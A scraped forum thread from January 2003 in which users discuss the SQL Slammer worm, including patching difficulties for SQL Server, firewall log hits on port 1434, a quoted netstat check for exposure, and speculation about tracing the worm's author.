said by psloss :

---

said by Just Bob :

---

Here's Robert Graham's view:
»www.robertgraham.com/journal/030···mer.html

---

Thanks for posting that; hadn't seen it. Very interesting analysis and conclusions.

Philip Sloss

---

said by nlocklin :

---

It's not "just be one of theese install from web deal[s]". In all fairness, the patches are difficult for a first time user to install. You have to unzip an archive, backup and then copy a bunch of files into various directories, and execute some scripts. Not rocket science obviously, but not a simple wizard or something that can be automatically installed from the web.

---

said by NetWatchMan :

---

I'm confused how he can dismiss the idea that this is a wake up call. What we're saying here is despite the relatively small number of hosts on the Internet vulnerable to this exploit, the impact was extremely serious.

---

said by Just Bob :

---

said by nlocklin :

---

First, I want to comment that although the patch process is labor intensive, that's still no excuse. These patches have come out frequently enough that any shop with a decent SQL Server admin would be prepared for something like this.

---

Hmmmm...

»news.com.com/2100-1001-982305.html

---

said by abaez :

---

If you don't have mysql you probably don't have to worry about getting infected. But the worm is wreaking havoc on everything. I ping 1000+ to almost every ip I try and my friends are the same.

---

said by Just Bob :

---

Here's Robert Graham's view:
»www.robertgraham.com/journal/030···mer.html

---

said by novaflare :

---

i just got to ask why dont people patch their servers?
First nimda now this one nimda was stopable by a patch tha was a few megs only.
How hard is it to check for soft ware updates?
Did i dl a patch for the iss server or this one nope because i dont use them but i have patched my sambar server when needed.

---

said by novaflare :

---

i just got to ask why dont people patch their servers?

---

said by NetWatchMan :

---

* Some of the earlier probes were being *sourced* from port 53 and 69 (DNS and DHCP, respectively). Presumably this is to fake out non-stateful inspection firewalls that have been configured to pass ALL DNS and DHCP responses to the inside network.

---

said by NetWatchMan :

---

I did some research on this say udp/1434 probes all the way back to November 2002 (and that's as far back as I went)...I suspect we've had a pretty constant (albeit under-the-radar) hacker activity probing for this vulnerabilty.

---

i can certainly say that i've never had a udp/1434 hit on my firewall in over 2 years until saturday. now tcp/1433 is a different matter. ]]> http://www.dslreports.com/forum/remark,5804493 Tue, 28 Jan 2003 01:25:13 EDT http://www.dslreports.com/forum/remark,5804308 NetWatchMan :

said by jheidtke :

---

Look at the data at »isc.incidents.org/port_details.h···ort=1434 for the dates 1/2, 1/11, 1/13, and 1/17. Many thousands of packets from a very small number of hosts. Looks like trial runs, and the IP's of those 14-20 hosts are known.

---

The problem is that a udp/1434 probe does NOT specifically mean Slammer...or Slammer testing.

I did some research on this say udp/1434 probes all the way back to November 2002 (and that's as far back as I went)...I suspect we've had a pretty constant (albeit under-the-radar) hacker activity probing for this vulnerabilty.

Lacking full packet-level details of each of these probes, it's impossible to really know which where Slammer related.

Several other interesting observations:

* Some of the earlier probes were being *sourced* from port 53 and 69 (DNS and DHCP, respectively). Presumably this is to fake out non-stateful inspection firewalls that have been configured to pass ALL DNS and DHCP responses to the inside network.

* Some of the targetting leading up the the full blow worm activity was to *broadcast* IPs (e.g. w.x.y.255)

I have a theory that this was the technique to quickly "seed" the worm and create an amplified flash effect....this could also enable infection of inside hosts on Private IPs (but sitting on a LAN with Internet access!).

More on that vulnerability if you press me. Cisco says it's intended behavior.
--
Lawrence Baldwin
myNetWatchman
The Internet Neighborhood Watch]]> http://www.dslreports.com/forum/remark,5804308 Tue, 28 Jan 2003 00:52:29 EDT http://www.dslreports.com/forum/remark,5804201 Just Bob :

said by nlocklin :

---

First, I want to comment that although the patch process is labor intensive, that's still no excuse. These patches have come out frequently enough that any shop with a decent SQL Server admin would be prepared for something like this.

---

Hmmmm...

»news.com.com/2100-1001-982305.html]]> http://www.dslreports.com/forum/remark,5804201 Tue, 28 Jan 2003 00:34:43 EDT http://www.dslreports.com/forum/remark,5803779 phriday613 :

said by jheidtke :

---

In might not be as hard to track down the culprit as some imagine. Look at the data at »isc.incidents.org/port_details.h···ort=1434 for the dates 1/2, 1/11, 1/13, and 1/17. Many thousands of packets from a very small number of hosts. Looks like trial runs, and the IP's of those 14-20 hosts are known. They are likely to be compromised systems that were used to launch the initial attacks. If so, there may be sufficient forensic evidence on those systems to at least get closer to those responsible.

Think someone might be looking through the dshield log database right now?

---

i dont know about "trial runs" but keep in mind that this specific vulnerability has been around for a while now, so those hits could also be just little ol' script kiddies trying to exploit whomever they could..
--
Help find a cure for Cancer - Join Team Discovery! ]]> http://www.dslreports.com/forum/remark,5803779 Mon, 27 Jan 2003 23:45:06 EDT http://www.dslreports.com/forum/remark,5803632 psloss :

said by jheidtke :

---

In might not be as hard to track down the culprit as some imagine. Look at the data at »isc.incidents.org/port_details.h···ort=1434 for the dates 1/2, 1/11, 1/13, and 1/17. Many thousands of packets from a very small number of hosts. Looks like trial runs, and the IP's of those 14-20 hosts are known. They are likely to be compromised systems that were used to launch the initial attacks. If so, there may be sufficient forensic evidence on those systems to at least get closer to those responsible.

---

Only if the attackers weren't smart enough to spoof the source IP in the original releases...which is easy to do with this worm. This exact worm doesn't look to me like it could be trial released without establishing a perimeter around it -- otherwise it would race like it did Saturday. Also, a small number of sources indicates either a different scan pattern than the random IP the worm uses or netblock scanning. A loop termination mod would be possible to keep in a test and remove, though. I'd still like to see packets from early January. Unfortunately, the Dshield data is probably a lot like our myNetWatchman data -- firewall logs of dropped packets. I'd be more suspicious of reconnaissance rather than trials.

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5803632 Mon, 27 Jan 2003 23:31:15 EDT http://www.dslreports.com/forum/remark,5803187 guycad$ :

said by nlocklin :

---

These patches have come out frequently enough that any shop with a decent SQL Server admin would be prepared for something like this. Where I work, I have a script written where I pass in a few parameters and it does everything in the script for me - all of the SQL Server patches generally follow that set of steps. And come on - it's been seven months. I could understand 1-3 months, but seven? I think the problem is that a lot of companies set up shop running SQL Server with nobody on board who is an expert in it. People think "Oh, it's Microsoft, so it has to be easy." I've seen that kind of situation a lot, and it provides a lucrative business opportunity for SQL Server consultants.

---

-heh- ;-) We pretty much said exactly the same thing but with slightly different emphasis.

For a small company, especially a company doing a 'co-location' setup, $30,000 (typical 2 processor M$ license cost) represents someone's (relatively low-end) salary for 6 months. The fact is - M$ has deliberately encouraged a belief that small business owners don't need experts on premises by claiming that M$ OS's and software is simple to set up and easy to use.

I'm glad to know that you are both contientious and competent to properly take care of the system's you administer. And I mean that seriously. I wish all admins were so good. But the unfortunate fact is that the vast makority of businesses and admins are not. This is regardless of OS.

It's just that one of the striking differences is that (as you rightly pointed out) M$ doesn't care about rolling out easy updates for SQL Server. As I said, I really don't blame all the hapless admins out there that got bit this time around. They've been sold on a 'easy to install, easy to use' software myth which happens to fit how they think things should work. And M$ has failed to carry 'easy to use, easy to install' to it's logical conclusion. IE - An 'easy to use, easy to install' maintenance module would have gone a long way (IMO) towards a lessened impact of this viris.

So I still lay this one at M$'s feet. There will always be stupid users. But this is no excuse for M$'s not taking a conservative approach to features versus security, lesser out of the box functionality (fewer functions turned on), and simply more secure coding practices.

Of course, this is just my opinion. YMMV :D
--
Gain a competitive advantage. Encourage your business rivals to buy Windows.]]> http://www.dslreports.com/forum/remark,5803187 Mon, 27 Jan 2003 22:51:06 EDT http://www.dslreports.com/forum/remark,5803159 jheidtke :

said by psloss :

---

What do you think of this claim? Source:
»www.kaspersky.com/news.html?id=970395
...
I'd sure like to see some packet data corroborating this; otherwise, it could have been SQLPing or something similar...

Philip Sloss

---

In might not be as hard to track down the culprit as some imagine. Look at the data at »isc.incidents.org/port_details.h···ort=1434 for the dates 1/2, 1/11, 1/13, and 1/17. Many thousands of packets from a very small number of hosts. Looks like trial runs, and the IP's of those 14-20 hosts are known. They are likely to be compromised systems that were used to launch the initial attacks. If so, there may be sufficient forensic evidence on those systems to at least get closer to those responsible.

Think someone might be looking through the dshield log database right now?]]> http://www.dslreports.com/forum/remark,5803159 Mon, 27 Jan 2003 22:48:46 EDT http://www.dslreports.com/forum/remark,5803000 justin : I'm not seeing the connection unless he has portsentry or iptables(?) using MySql to log ?? thats pretty bad, a stream of tiny packets aimed at a logged port would knock out his server with the logging load.]]> http://www.dslreports.com/forum/remark,5803000 Mon, 27 Jan 2003 22:38:09 EDT http://www.dslreports.com/forum/remark,5802751 jig : just thought you all might want to read this, re the mysql vs mssql 2000 confusion at the beginning:

said by www.2cpu.com:

---

looked at it this morning when I woke up and it was an easy fix. MySQL was spawning sessions like crazy. About 5-10 times as many as it normally requires. The reason was because of all the flooding that was going on yesterday portsentry and iptables added several firewall rules basically to protect itself.
So even though we aren't running a compromised DB package (SQL Server 2000), we still indirectly fell victim to the worm madness.

---

-jig]]> http://www.dslreports.com/forum/remark,5802751 Mon, 27 Jan 2003 22:20:09 EDT http://www.dslreports.com/forum/remark,5802217 justin : top notch MIT grads? as far as I know the vast majority of their programmers are kids from india who are taken right from college. MS has never been very good at hiring anyone with outside experience. It makes them harder to borg :) but really .. they prefer rank and file of cheaper guys with no life who sleep under the desk on weekends to write code. I think the few super stars are put into research projects and made to consider how to build bridges "embrace" to the other half of the computing landscape so they can then "extend".]]> http://www.dslreports.com/forum/remark,5802217 Mon, 27 Jan 2003 21:38:44 EDT http://www.dslreports.com/forum/remark,5802099 jimkyle :

said by phriday613 :

---

My question still is around for anyone who wants to comment.. how the hell does MS employ so many top notch MIT graduates with such high GPA's, blah blah blah, yet their software has such wide open vulnerabilities.. The first thing i was taught in my crappy colleges' software enginering class was to cover all bases when coding! How do i know that, but MS doesnt?

---

In my opinion it's a matter of corporate culture. I participated in true (not public) beta testing for MS-DOS 5.0; at that time MS-DOS had a serious problem in the display logic, which would lock the machine up solid and require a big-red-switch reboot, under certain circumstances. Another beta tester, the author of a very popular display-font-generating program, discovered the cause of the problem and even provided a little chunk of assembler code to replace the offending section. There was still plenty of time before the scheduled release date to get it in and do full regression testing...

However the official response was "Sorry, no changes permitted in that area." The fix finally found its way into MS-DOS 6.22, but not before!

The message that I, and most of the other testers, got was that "Not Invented Here" still ruled in Redmond, and that applies to all the software development rules developed elsewhere, not just to a few lines of code...

Another example: There was an extremely serious bug in MSVC++ 4.0 involving full optimization, in which the result of an "if" statement was destroyed before being acted on. This bug remained in the compiler for at least four more years, and created a serious bug in the data manager utility that I support (as an independent consultant) throughout all of its released version 6 32-bit builds. That bug, alone, has contributed more than half of my income for the past five years by corrupting clients' databases. Microsoft's response to the situation: they acknowledged the existence of the bug in the compiler a few years ago, but had no timetable at all for correcting it!

Sorta reminds me of Lily Tomlin's Josephine: "We don't have to care..."
--
-- Jim Kyle]]> http://www.dslreports.com/forum/remark,5802099 Mon, 27 Jan 2003 21:29:09 EDT http://www.dslreports.com/forum/remark,5801485 phriday613 :

said by justin :

---

said by NetWatchMan :

---

""The real threat to the Internet is not from hackers. ... The threat is people and businesses connecting to the Internet in insecure ways," said Lawrence Baldwin, who runs Internet security firm myNetWatchman.com. "

»www.cnn.com/2003/TECH/internet/0···ex.html

---

Thats not a threat to the internet! thats a threat to themselves! The serious threat is that internet software is not diverse enough. Diversity == resistance to disease. Software homogeneity is a false prophet!

---

That does sound true.. if everyone uses the same software, or the same OS, as we see with microsoft products, many viruses and vulnerabilities are sought and found.. it becomes more scrutinized, and almost used against you.

when diversity is used, not MANY, but only those some are used as the targets. Since using linux, I have been pretty dry with these viruses and vulnerabilities. I chose to have a linux firewall to make sure that these pesky windows virii dont get past me and make me look stupid. This "diversity" as Justin says, has kept me, and all those others who are using diverse methods, also clean..

The issue also stands of firewalling. Your firewall shouldnt look like swiss cheese, but rather a brick wall.. That pinhole in that brick wall, should be a secure way to connect to a server or gateway to a server. There shouldnt be such a gaping hole left open like that.. Windows XP, minus the built in firewall, is still very suseptable to hacking or DoS'ing! Why does MS allow this to happen!?

My question still is around for anyone who wants to comment.. how the hell does MS employ so many top notch MIT graduates with such high GPA's, blah blah blah, yet their software has such wide open vulnerabilities.. The first thing i was taught in my crappy colleges' software enginering class was to cover all bases when coding! How do i know that, but MS doesnt?


--
Help find a cure for Cancer - Join Team Discovery!
[text was edited by author 2003-01-27 20:47:27]]]> http://www.dslreports.com/forum/remark,5801485 Mon, 27 Jan 2003 20:40:20 EDT http://www.dslreports.com/forum/remark,5801123 psloss : What do you think of this claim? Source:
»www.kaspersky.com/news.html?id=970395

"It is possible to state with certainty that 'Helkern' appeared far before the 25th of January when anti-virus companies first brought it to the attention of the mass media. January 20, 2003 at 19:07 marked the first time data similar to 'Helkern' worm copies were detected by Kaspersky Labs. The data was sent from a computer belonging to an U.S.-based Internet service provider. However this doesn't mean that company's employees created 'Helkern' - most likely their server was remotely infected. Therefore the truth about the virus's origin might be hiding in the request log-files of that server."

I'd sure like to see some packet data corroborating this; otherwise, it could have been SQLPing or something similar...

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5801123 Mon, 27 Jan 2003 20:11:03 EDT http://www.dslreports.com/forum/remark,5800739 justin : they dont have a CHANCE to find the guy who wrote it unless he is careless. A single UDP packet he fired at one SQL server was enough to start the cascade, and even if it was logged (they are almost never logged) the source IP could be fake as no reply is needed. Not a CHANCE. (unless he boasted to someone, or left a fingerprint in the tiny amount of code).]]> http://www.dslreports.com/forum/remark,5800739 Mon, 27 Jan 2003 19:36:43 EDT http://www.dslreports.com/forum/remark,5800656 psloss : More post mortem:
"Setbacks in search for worm author"
»news.com.com/2100-1001-982284.html

Philip Sloss
--
Feedback? e-mail: stuff@lupwa.org ]]> http://www.dslreports.com/forum/remark,5800656 Mon, 27 Jan 2003 19:29:46 EDT http://www.dslreports.com/forum/remark,5800558 Grumpy :

From Steve Gibson

"You may quickly and easily check your system:
It is unlikely that typical personal computer users will be vulnerable to this worm's infection attempts, so you probably have nothing to worry about. Most personal computers are not running Microsoft's "SQL Server", so there is no point of entry for this infection.

To quickly verify that your system is not running Microsoft's SQL Server, and therefore can not be infected by Sapphire/Slammer worm probes, enter the following command in an "MS-DOS Prompt" window:

netstat -an | find "1434"

This DOS command line checks for the presence of any process "listening" on your computer's port 1434. Your system might be vulnerable only if some lines containing "1434" are printed to the screen when this command is entered. Otherwise, your computer can not be infected by this new worm. "]]> http://www.dslreports.com/forum/remark,5800558 Mon, 27 Jan 2003 19:21:34 EDT http://www.dslreports.com/forum/remark,5799536 justin :

said by NetWatchMan :

---

""The real threat to the Internet is not from hackers. ... The threat is people and businesses connecting to the Internet in insecure ways," said Lawrence Baldwin, who runs Internet security firm myNetWatchman.com. "

»www.cnn.com/2003/TECH/internet/0···dex.html

---

Thats not a threat to the internet! thats a threat to themselves! The serious threat is that internet software is not diverse enough. Diversity == resistance to disease. Software homogeneity is a false prophet!]]> http://www.dslreports.com/forum/remark,5799536 Mon, 27 Jan 2003 17:49:40 EDT http://www.dslreports.com/forum/remark,5799338 NetWatchMan : ""The real threat to the Internet is not from hackers. ... The threat is people and businesses connecting to the Internet in insecure ways," said Lawrence Baldwin, who runs Internet security firm myNetWatchman.com. "

»www.cnn.com/2003/TECH/internet/0···dex.html
--
Lawrence Baldwin
myNetWatchman
The Internet Neighborhood Watch]]> http://www.dslreports.com/forum/remark,5799338 Mon, 27 Jan 2003 17:32:10 EDT http://www.dslreports.com/forum/remark,5799155 nlocklin :

said by guycad$ :

---

55meg download? And you are required to have SP2 installed first? And you may not even know you have SQLserver installed? Available only as of last week? And that's the 'easy' update?!?!?!?!?!?!?!?!?

Nah, I lay the blame for this squarely at M$'s feet. Especially after reading the patch process which was the patch method from June '02 to last week. That's just about 7 months in my book.

M$ touts how much 'easier' and 'intuitive' their products are compared to the *nixes. Yeah, Right. That's about the least 'easy' and 'intuitive' patch process I've ever read. I'm not surprised that so many people had their respective systems vulnerable. Not surprised at all.

---

First, I want to comment that although the patch process is labor intensive, that's still no excuse. These patches have come out frequently enough that any shop with a decent SQL Server admin would be prepared for something like this. Where I work, I have a script written where I pass in a few parameters and it does everything in the script for me - all of the SQL Server patches generally follow that set of steps. And come on - it's been seven months. I could understand 1-3 months, but seven? I think the problem is that a lot of companies set up shop running SQL Server with nobody on board who is an expert in it. People think "Oh, it's Microsoft, so it has to be easy." I've seen that kind of situation a lot, and it provides a lucrative business opportunity for SQL Server consultants.

That having been said, here's another thing I feel strongly about... Microsoft completely ignores SQL Server in coming out with new hotfix products. MS has come a long way with their hotfixes - from reducing them to simple wizards (or configurable automatic installs) to not needing to reboot the server. They've released good software to scan an entire domain/network for missing patches. And on, and on... but none of these improvements have been made with SQL Server! Their reporting software doesn't accurately examine SQL Server's patch status (it just lists the bulletin number with "NOTE" - meaning it can't tell if you have it installed, so you have to determine for yourself). And then there's the steps involved with installing a hotfix. You have to stop and restart services manually, which adds to downtime. You have to copy files manually, which is dumb. Of course, as I pointed out - if you're a good admin you'll put it all in scripts so as to minimize downtime and effort, but still... if every other product can have neat installation wizards for hotfixes, why not SQL Server?]]> http://www.dslreports.com/forum/remark,5799155 Mon, 27 Jan 2003 17:15:29 EDT http://www.dslreports.com/forum/remark,5798737 phriday613 : thanks for the clarification!

i guess thats the problems you get for opening a port.. all the vulnerabilities that come with it..

i guess im luckier then most companies, being a home user. I have the option to "DENY everything, allow only whats needed" type of firewall rule.
--
Help find a cure for Cancer - Join Team Discovery! ]]> http://www.dslreports.com/forum/remark,5798737 Mon, 27 Jan 2003 16:32:26 EDT http://www.dslreports.com/forum/remark,5798390 justin : well I don't think it is prudent to run any site that uses more than one server (eg sql+web or sql+sql+web+web+cgi or whatever) in any config other than single point of entry, a private net, and firewall rules. But I guess low cost hosting has encouraged both shared exposed sql servers, and the "one client one server" approach. ugh.]]> http://www.dslreports.com/forum/remark,5798390 Mon, 27 Jan 2003 15:51:57 EDT http://www.dslreports.com/forum/remark,5798244 twodogs : I logged 10,674 from 23:59 on the 25th - 23:59 on the 26th on port 1434 (blocked), and today I logged 2,380 from midnite to 07:30.
It is still there, but slowing down.
--
Madness takes its toll... Please have exact change ready !]]> http://www.dslreports.com/forum/remark,5798244 Mon, 27 Jan 2003 15:36:08 EDT http://www.dslreports.com/forum/remark,5798225 stevelee0 :

said by justin :

---

For some odd reason, microsoft servers are often installed fully exposed, probably because 2k/NT/Xp as yet provides only 1% of the typical linux/netfilter firewalling features, and bolt-on software firewalls tend to be of the home user variety concentrating more on flashy guis than utility.
In addition, since MS says this port is needed by remote sql clients, and is part of the SQL package, an admin who does have a dedicated firewall protecting their server farm may have arranged for the port to be open anyway.

---

Most servers colocated at ISPs are completely exposed, and have no firewalls between them and the Internet. Why? People want the Internet to access their servers at full bandwidth, with as little latency as possible. Also, infrastructure firewalls cost money, and many people don't want to pay an added cost per month on top of their current colocation bill to pay for security.

Having said that, you're right about the tools available within many operating systems to provide basic access control and port filtering.

As to fully exposed home systems being used as attack systems, there's no excuse for home users NOT to implement hardware and/or software firewalls. But I'm afraid that until ISPs insist on users' firewalls as a part of their terms of service, home systems will continue to be infected, compromised and abused.]]> http://www.dslreports.com/forum/remark,5798225 Mon, 27 Jan 2003 15:33:55 EDT http://www.dslreports.com/forum/remark,5798018 justin :

said by phriday613 :

---

but heres a question.. why is this port 1434 or 1433 even visible at the firewall?

wouldnt a proper firewall totally block this from entering?? or is this mssqlmrg or whatever program name it is only on computers that are unprotected?? i dont get it.. why arent firewalls blocking this, patched or unpatched..

---

For some odd reason, microsoft servers are often installed fully exposed, probably because 2k/NT/Xp as yet provides only 1% of the typical linux/netfilter firewalling features, and bolt-on software firewalls tend to be of the home user variety concentrating more on flashy guis than utility.
In addition, since MS says this port is needed by remote sql clients, and is part of the SQL package, an admin who does have a dedicated firewall protecting their server farm may have arranged for the port to be open anyway.]]> http://www.dslreports.com/forum/remark,5798018 Mon, 27 Jan 2003 15:15:06 EDT http://www.dslreports.com/forum/remark,5798008 graysonf :

said by phriday613 :

---

but heres a question.. why is this port 1434 or 1433 even visible at the firewall?

---

No firewall at all, or it has been deliberately left open to allow access to these ports.]]> http://www.dslreports.com/forum/remark,5798008 Mon, 27 Jan 2003 15:14:10 EDT http://www.dslreports.com/forum/remark,5797966 phriday613 : but heres a question.. why is this port 1434 or 1433 even visible at the firewall?

wouldnt a proper firewall totally block this from entering?? or is this mssqlmrg or whatever program name it is only on computers that are unprotected?? i dont get it.. why arent firewalls blocking this, patched or unpatched..
--
Help find a cure for Cancer - Join Team Discovery! ]]> http://www.dslreports.com/forum/remark,5797966 Mon, 27 Jan 2003 15:10:06 EDT http://www.dslreports.com/forum/remark,5797783 cork1958 : Not nerly as bad today. Still have had about 30 hits in 6 hours. Was running pretty slow early this morning.
--
»www.geocities.com/cork1958]]> http://www.dslreports.com/forum/remark,5797783 Mon, 27 Jan 2003 14:52:36 EDT http://www.dslreports.com/forum/remark,5797758 guycad$ : I see a bit of griping about how all these M$ SQL server admins should have already had their systems patch, yada-yada-yada.

To be perfectly frank, I don't blame these hapless server admins at all. From the article here: »www.theinquirer.net/?article=7419

quote:

---

UPDATE 11:35 UT Microsoft's page on Mr Slammer Microsoft's release of SP3 for SQL Server, which we reported on last week, may be a little easier than the method listed in our original story below, if you can stand the 55MB download...

The patch itself is released here, and has an installer. And, in addition, SP3 also includes this fix, while latest security bulletins are here.

And below is our earlier story:

THE TWO ORIGINAL CERT alerts are here and here, both of which are fixed by one Microsoft patch (MS02-039, Q323875) - which you can find here on the MS site.

The following is the installation directions for the current cumulative security hot- fix for SQL server (the one you are supposed to install) here.

Just to show you why it takes so long to do and why two people are required (one to do, one to check) -

To install the hotfix, follow these steps:

1. Install SQL Server 2000 Service Pack 2. Do not continue with the installation until you successfully install SQL Server 2000 Service Pack 2.

2. Shut down the Microsoft SQL Server and the SQL Server Agent services.

3. Make a backup copy of: a. The Sqlservr.exe, Odsole70.dll, Xpqueue.dll, Xprepl.dll, Xpweb70.dll, Xplog70.dll, Ssnetlib.dll, Sqlcmdss.dll, Sqlagent.dll, Sqlagent.exe and Xpstar.dll files from the \Binn folder and the Sqlservr.pdb file from the \Binn\Exe folder.

b. The Impprov.dll, rdistcom.dll, Replmerg.exe, Rinitcom.dll, Logread.exe and qrdrsvc.exe files from the \Microsoft SQL Server\80\COM folder.

c. The Instdist.sql, Replcom.sql, Replmerg.sql, Repltran.sql, and Replsys.sql files from the \install folder.

d. The sqlcmdss.rll and sqlagent.rll files from the \Binn\Resources\ folder.

e. The Distmdl.ldf and the Distmdl.mdf files from the \Data folder.

4. Next, copy:

a. The Sqlservr.exe, Odsole70.dll, Xpqueue.dll, Xprepl.dll, Xpweb70.dll, Xplog70.dll, Ssnetlib.dll, Sqlcmdss.dll, Sqlagent.dll, Sqlagent.exe and the Xpstar.dll files from the hotfix self-extracting archive into the \Binn folder, and then copy the Sqlservr.pdb file into the \Binn\Exe folder.

b. The Impprov.dll, rdistcom.dll, Replmerg.exe, Rinitcom.dll, Logread.exe and qrdrsvc.exe files from the hotfix self-extracting archive into the \Microsoft SQL Server\80\COM folder.

c. The Instdist.sql, Replcom.sql, Replmerg.sql, Repltran.sql and the Replsys.sql files from the hotfix self-extracting archive into the \install directory.

d. The sqlcmdss.rll and sqlagent.rll files from the hotfix self-extracting archive into the \Binn\Resources\ folder.

e. The Distmdl.ldf and the Distmdl.mdf files from the hotfix self-extracting archive into the \Data folder.

5. Start the Microsoft SQL Server and SQL Server Agent services.

6a. Connect to SQL Server as a member of the system administrator (sa) role or as the sa by using SQL Query Analyzer or the osql utility (osql.exe), and then execute Qfe356326.sql and SecurityHotfix.sql.

6b. If this server is used with replication and if you have distribution databases, connect as a member of the system administrator (sa) role or as the sa by using SQL Query Analyzer or the osql utility (osql.exe), and then switch into the context of each distribution database in turn, executing qfe360814_dist.sql.

7. Run the Servpriv.exe tool from the command prompt. When you run Servpriv.exe, specify a SQL Server 2000 instance to set the appropriate privileges on the corresponding service registry keys. For more information about Servpriv.exe, see the "Information About Servpriv.exe" section, located at the end of this file.

Now wasn't that simple and easy? And as an added bonus you get to do this once for each SQL server you currently have (Typically Primary and Backup servers for production, customer demo(beta test) server, Test (alpha test) server, development server and marketing database server).

---

55meg download? And you are required to have SP2 installed first? And you may not even know you have SQLserver installed? Available only as of last week? And that's the 'easy' update?!?!?!?!?!?!?!?!?

Nah, I lay the blame for this squarely at M$'s feet. Especially after reading the patch process which was the patch method from June '02 to last week. That's just about 7 months in my book.

M$ touts how much 'easier' and 'intuitive' their products are compared to the *nixes. Yeah, Right. That's about the least 'easy' and 'intuitive' patch process I've ever read. I'm not surprised that so many people had their respective systems vulnerable. Not surprised at all.

:D
--
Gain a competitive advantage. Encourage your business rivals to buy Windows.]]> http://www.dslreports.com/forum/remark,5797758 Mon, 27 Jan 2003 14:50:00 EDT http://www.dslreports.com/forum/remark,5795284 Sparrow : Thank you, Broadsword! I saved my possible panic hoping your statement (or anyone who might have answered) correlated with my own thoughts!
--
Crystal Sky]]> http://www.dslreports.com/forum/remark,5795284 Mon, 27 Jan 2003 10:11:19 EDT http://www.dslreports.com/forum/remark,5794352 broadsword : Crystal Sky, as for the My Data Sources folder, I think that gets installed with Office XP. Not sure about the log entries, but it appears everything got blocked.]]> http://www.dslreports.com/forum/remark,5794352 Mon, 27 Jan 2003 06:26:19 EDT http://www.dslreports.com/forum/remark,5790019 okitismine : So many posts I am not sure this link has been posted. This is a scanner for the worm.

»www.eeye.com/html/Research/Tools···SQL.html]]> http://www.dslreports.com/forum/remark,5790019 Sun, 26 Jan 2003 19:12:46 EDT http://www.dslreports.com/forum/remark,5789947 Sparrow :
Okay - now that the dust is settling, I have a question. I opened the "My Documents" file and low and behold I found a newly aquired folder named "My Data Sources." Now this folder has never been there before. I opened it and it contains:

A Desktop Configuration Setting
an HTC File named "DATACON"
an Icon Folder which reveals one small icon and
TWO Microsoft Office Data Connection Files which contains two files:
"Connect to New Data Source" and
"+New SQL Server Connection"

These files are all dated in the year 2000.

So now, fool that I am, does this mean anything??? Suddenly I have SQL Server files on my computer where I never saw them before.

This is a partial log of what I have been seeing:

1/26/2003 6:19:43 PM,No User,"Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)).","Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)). Inbound UDP packet Local address,service is (255.255.255.255,bootps(67)) Remote address,service is (0.0.0.0,bootpc(68)) Process name is ""N/A"""

1/26/2003 6:19:34 PM,No User,"Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)).","Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)). Inbound UDP packet Local address,service is (255.255.255.255,bootps(67)) Remote address,service is (0.0.0.0,bootpc(68)) Process name is ""N/A"""

1/26/2003 6:19:30 PM,No User,"Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)).","Rule ""Implicit block rule"" blocked (0.0.0.0,bootps(67)). Inbound UDP packet Local address,service is (255.255.255.255,bootps(67)) Remote address,service is (0.0.0.0,bootpc(68)) Process name is ""N/A"""

1/26/2003 6:19:27 PM,No User,Rule "Block Windows File Sharing" blocked communication.,"Rule ""Block Windows File Sharing"" blocked communication. Local address: xxxxxxxxx(xxxxxxxxxxxxxxx)(netbios-ssn(139)). Process name is ""System"""

1/26/2003 6:38:40 PM,Supervisor,TCP non-syn/non-ack packet on invalid connection. Packet has been dropped.,"TCP non-syn/non-ack packet on invalid connection. Packet has been dropped. Source IP address: 64.78.42.110. Destination IP address: xxxxxxxxxxxxxxxxxxxxxxxxxxxxx. TCP Source Port: http(80) TCP Destination Port: 1190 Flags: 0x00000010"

The list goes on and on for today and I sincerely have never seen so many of these entries on a single day. Can anyone explain for me please?
--
Crystal Sky]]> http://www.dslreports.com/forum/remark,5789947 Sun, 26 Jan 2003 19:05:08 EDT http://www.dslreports.com/forum/remark,5789244 poiwv : Another list of compiled links.]]> http://www.dslreports.com/forum/remark,5789244 Sun, 26 Jan 2003 17:49:38 EDT http://www.dslreports.com/forum/remark,5788814 justin :

quote:

---

The South Korean Information Minister, Lee Sang-Chul, said he believed the problem was hiding, rather than fully resolved.

---

Bah. Why don't they leave quotes to the experts?]]> http://www.dslreports.com/forum/remark,5788814 Sun, 26 Jan 2003 17:09:54 EDT http://www.dslreports.com/forum/remark,5788764 Edit This : Check out this link. It could be a potential Bombshell.
--
78% of all statistics are wrong....and....All generalizations are false. Hullodare]]> http://www.dslreports.com/forum/remark,5788764 Sun, 26 Jan 2003 17:05:52 EDT http://www.dslreports.com/forum/remark,5788701 IGGY : For all those interested in the multiple news takes on this story. Or if your looking for all the different links posted here in 1 place. I've again updated this link »www.iggyz.com/files/Bookmarkz/antivirus.html to include the links I've seen here. And the stories I've come across so far that cover this.
Update - just added this link from below »www.meer.net/cashman/Website/slammer.html to the page above.
--
Test Your Security *
TeamZ Member *
Cable Modem Diagnostics
InsightBB 3000/128 XP PRO
[text was edited by author 2003-01-26 18:23:13]]]> http://www.dslreports.com/forum/remark,5788701 Sun, 26 Jan 2003 17:00:06 EDT http://www.dslreports.com/forum/remark,5788072 Link Logger :

said by psloss :

---

Let me ask what you think about another factor: the filtering. Do you think the author anticipated the much more active response when compared to the worms over tcp/80?

---

Definitely. Filtering 1434 is a low risk option for a ISP to do, as the only systems it typically would affect are the systems being attacked. 1434 is a registered port for SQL Server Monitor and most SQL Server installs shouldn't even have this port exposed to begin with so systems that were patched and survived the attack wouldn't likely be adversely affected by filtering 1434. Filtering port 80 during Code Red for example would affect both corporate and non-corporate web sites and sites that were not at risk (Apache for example). I think that the author knew this when he wrote the worm, as it is a viable response to the worm. I would also guess that the rapid propagation rate more then compensated for the filtering as I would venture to say that the worm had consumed all the available systems long before ISPs started implementing filtering. Filtering was implemented more as a bandwidth/network saving measure then as a defense against the worm itself (for a number of ISPs the choice was filter or overwhelm the network and lose it, so it was a no brainer for some ISPs to filter a single port).

Given the current tendency to worm releases on long weekends or weekends with significant events, one should always be mindful of the calendar anymore when evaluating security risks.

Blake]]> http://www.dslreports.com/forum/remark,5788072 Sun, 26 Jan 2003 16:05:57 EDT http://www.dslreports.com/forum/remark,5787319 sammysnake : My first hit from this was at 22:31:02 from 66.202.30.30
========================================================

